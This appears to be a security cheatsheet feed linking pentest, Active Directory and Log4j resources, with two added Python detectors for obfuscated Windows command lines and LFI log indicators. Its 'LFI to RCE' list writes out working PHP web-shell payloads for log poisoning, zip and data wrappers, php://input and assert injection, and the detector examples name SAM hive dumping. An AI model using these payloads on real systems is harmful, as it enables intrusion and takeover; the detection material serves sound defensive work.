Windows Command-Line Obfuscation
Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. Because command-line arguments are parsed inconsistently from one executable to the next, detecting a specific command by matching its literal text becomes harder: the number of equivalent spellings is large. This post shows how more than 40 often-used, built-in Windows applications are vulnerable to forms of command-line obfuscation, and presents a tool for analysing other executables.
# https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
#cheatsheet #cmd #pentest
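The detection-side consequence of the post above is that a literal string match on a process command line is easy to dodge. The following is an added example, not code from the post or its tool: a small Python normaliser that folds a few spelling variants (cmd.exe caret escapes, inserted double quotes, `-` used instead of `/` as the option marker, image path and `.exe` suffix, case) before a rule is evaluated. The set of option-marker substitutes, the sample command lines and the `reg save` rule are constructed for illustration; which substitutions a given binary actually accepts must be confirmed per executable.

```python
import ntpath
import re
import unicodedata

# Option-marker characters mapped to the canonical "/". Which substitutes a given
# binary accepts varies per parser; this set is an assumption for illustration.
OPTION_CHARS = {"-": "/", "\u2013": "/", "\u2014": "/", "\uff0d": "/"}
_OPTION_RE = re.compile(r"(?<!\S)[" + re.escape("".join(OPTION_CHARS)) + r"]")


def normalize_cmdline(cmdline: str, via_cmd: bool = True) -> list[str]:
    """Collapse known spelling variants of a Windows command line into tokens.

    via_cmd: the line was launched through cmd.exe, so "^" is an escape
    character that the parser drops (re^g -> reg). Leave False for lines
    passed directly to CreateProcess, where a caret is a literal character.
    """
    s = unicodedata.normalize("NFKC", cmdline)   # fold compatibility chars (fullwidth etc.)
    if via_cmd:
        s = s.replace("^", "")                    # cmd.exe escape char: re^g -> reg
    s = s.replace('"', "")                        # quote insertion: "re"g -> reg
    s = _OPTION_RE.sub("/", s)                    # -y at token start -> /y
    tokens = s.casefold().split()                 # case and whitespace variations
    if tokens:
        image = ntpath.basename(tokens[0])        # C:\Windows\System32\reg.exe -> reg.exe
        tokens[0] = image[:-4] if image.endswith(".exe") else image
    return tokens


def matches_rule(cmdline: str, rule_tokens: list[str]) -> bool:
    """True when every rule token appears in the normalised command line."""
    tokens = normalize_cmdline(cmdline)
    return all(t in tokens for t in rule_tokens)


# Constructed rule: SAM hive export via reg.exe (assumed detection content).
SAM_DUMP_RULE = ["reg", "save", "hklm\\sam"]

# Constructed variants of the same command, each defeating a naive literal match.
VARIANTS = [
    r"reg save HKLM\SAM C:\Temp\sam.hiv /y",
    r'REG.EXE "save" HKLM\SAM C:\Temp\sam.hiv -y',
    r"C:\Windows\System32\reg.exe save hklm\sam C:\Temp\sam.hiv /y",
    r"re^g sa^ve HKLM\SAM C:\Temp\sam.hiv /y",
]
BENIGN = r"reg query HKLM\SOFTWARE\Microsoft\Windows /s"

if __name__ == "__main__":
    for v in VARIANTS + [BENIGN]:
        print(matches_rule(v, SAM_DUMP_RULE), normalize_cmdline(v))
```

Normalising before matching is the cheap half of the fix; the other half is knowing, per binary, which substitutions its parser really tolerates, which is what the post's analysis tool is for. Note that stripping carets and quotes unconditionally can also merge or alter legitimate arguments, so keep the raw command line alongside the normalised tokens for triage.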
OFFENSIVE SECURITY CHEATSHEET
— Open Source Intelligence (OSINT)
— Web Pentest
— Network
— Shells methods
— Windows Systems
— Linux Systems
— Other Systems
— Passcracking Hash & Files
— Phishing, RedTeam and SE
— Wireless
— Cryptography
— Pwn
— External Resources
https://cheatsheet.haax.fr/
#cheatsheet #pentest #osint #ad
Active Directory Penetration Testing Cheatsheet
https://infosecwriteups.com/active-directory-penetration-testing-cheatsheet-5f45aa5b44ff
#AD #pentest #cheatsheet
Kali Linux Tools Page
Now you can learn more about all the tools that you can install in Kali.
https://kali.org/tools/
#tools #cheatsheet #kali
Blue Team Notes
A collection of one-liners, small scripts, and some useful tips for blue team work.
https://github.com/Purp1eW0lf/Blue-Team-Notes
#blueteam #cheatsheet
Windows Privileges
https://speakerdeck.com/fr0gger/windows-privileges
#windows #privileges #cheatsheet
Achieving LFI to RCE
1. Apache Log Poisoning
GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
2. SSH Log Poisoning
ssh '<?php system($_GET["c"]);?>'@target.com
/show.php?file=/var/log/auth.log&c=ls
3. SMTP Log Poisoning
telnet target.com 25
MAIL FROM:<test@example.com>
RCPT TO:<?php system($_GET['c'])?>
/show.php?file=/var/log/mail.log&c=ls
4. Image Upload
exiftool -Comment='<?php echo "Command:"; if($_POST){system($_POST["cmd"]);} __halt_compiler();' img.jpg
/show.php?file=../img.jpg (the payload reads POST, so send the command as POST parameter cmd, e.g. cmd=ls)
5. /proc/self/environ
GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
6. php://filter
Read source code; it may contain sensitive data (usernames/passwords, private keys etc) -> RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
"php://filter" is case insensitive. Try URL/double encoding.
7. Zip upload
echo '<?php system($_GET["c"]);?>' > shell.php
zip shell.zip shell.php
mv shell.zip shell.jpg
rm shell.php
/show.php?file=zip://shell.jpg%23shell.php
8. data://text/plain
/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>
/show.php?file=data://text/plain,<?php phpinfo()?>
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=
(the base64 decodes to <?php system($_GET['c']);echo 'shell!';?>)
9. /proc/self/fd/{id}
Include the shell in a logged header (User-Agent, Authorization, Referer etc) and access /proc/self/fd/{id}, where {id} is the descriptor number the web server holds open on that log file (iterate over small integers).
10. expect://
/show.php?page=expect://ls
11. php://input
POST /index.php?page=php://input HTTP/1.1

<?php system('ls')?>
12. RCE via vulnerable assert statement
Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '
13. Log files
/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log
Insert the payload via headers (User-Agent, Authorization, Referer etc)
14. Via PHP sessions
https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/
15. Via SSH
If SSH is active, check which user the web server runs as (/proc/self/status & /etc/passwd) and try to read <HOME>/.ssh/id_rsa
16. vsftpd Log Poisoning
Try to log in (ftp) with the PHP payload as the username and access /var/log/vsftpd.log
17. Automation
https://github.com/D35m0nd142/LFISuite
#lfi #rce #cheatsheet
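Every technique in the list above leaves a trace in the web server's own access log: a stream wrapper or sensitive path in the request target, or PHP tags in a header the server writes to disk. The following is an added example (not part of the cheatsheet or of LFISuite): a Python detector that parses Apache combined-format lines, percent-decodes the request target repeatedly so that the URL/double-encoding and mixed-case tricks noted under php://filter do not slip past, and flags the wrappers, paths and poisoned headers listed on the page. The log lines are constructed for the example; the parameter names (`file`, `c`) follow the cheatsheet's `show.php`.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format: ip ident user [ts] "req" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def normalize(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable (defeats double/triple encoding), then casefold."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.casefold()


# Indicator name -> regex applied to the normalised request target.
TARGET_INDICATORS = {
    "php_filter_wrapper": re.compile(r"php://filter"),
    "php_input_wrapper": re.compile(r"php://input"),
    "zip_wrapper": re.compile(r"zip://"),
    "data_wrapper": re.compile(r"data:(//)?text/plain"),
    "expect_wrapper": re.compile(r"expect://"),
    "path_traversal": re.compile(r"\.\./"),
    "proc_self_environ": re.compile(r"/proc/self/environ"),
    "proc_self_fd": re.compile(r"/proc/self/fd/\d+"),
    "log_file_path": re.compile(r"/var/log/|/log/(error|access)_?log"),
    "ssh_private_key": re.compile(r"\.ssh/id_(rsa|ed25519|ecdsa|dsa)"),
}
PHP_TAG = re.compile(r"<\?(php|=)")  # PHP open tag planted in a logged field


def analyze_line(line: str) -> dict:
    """Parse one access-log line and return the indicators it triggers."""
    m = LOG_RE.match(line)
    if not m:
        return {"parsed": False, "findings": ["unparseable_line"]}
    target = normalize(m.group("target"))
    findings = [name for name, rx in TARGET_INDICATORS.items() if rx.search(target)]
    # Log poisoning: PHP code in a header the server writes to its log files.
    for header in ("ua", "referer"):
        if PHP_TAG.search(normalize(m.group(header))):
            findings.append(f"php_tag_in_{header}")
    if PHP_TAG.search(target):  # data:// and php://input style payloads
        findings.append("php_tag_in_target")
    return {"parsed": True, "ip": m.group("ip"), "target": target, "findings": findings}


def scan(lines):
    """Return (ip, findings) for every line that raised at least one indicator."""
    hits = []
    for line in lines:
        result = analyze_line(line)
        if result["findings"]:
            hits.append((result.get("ip", "?"), result["findings"]))
    return hits


# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /show.php?file=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1" 200 9023 "-" "<?php system($_GET[\'c\'])?>"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /show.php?file=PHP%3a%2f%2fFilter/convert.base64-encode/resource=index.php HTTP/1.1" 200 3001 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /show.php?file=%252e%252e%252f%252e%252e%252fproc/self/environ HTTP/1.1" 200 700 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /show.php?file=zip://shell.jpg%23shell.php HTTP/1.1" 200 40 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, ", ".join(findings))
```

Decoding several rounds before matching is the important part: a rule that looks for the literal `php://filter` misses `PHP%3a%2f%2fFilter`, and one that looks for `../` misses `%252e%252e%252f`. The same normalisation applies to the error log paths under item 13, where the poisoned User-Agent lands when the request fails.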
Bug Bounty Tip — Log4j Vulnerability Cheatsheet
— How It Works
— Test Environments
— Challenges & Labs (Rooms)
— Where Payloads can be Injected
— What Information can be Extracted
— How To Identify (Services & Scanners)
#log4j #cheatsheet #bugbounty
Active Directory Checklist — Attack & Defense Cheatsheet
https://cybersecuritynews.com/active-directory-checklist/
#ad #cheatsheet #redteam #blueteam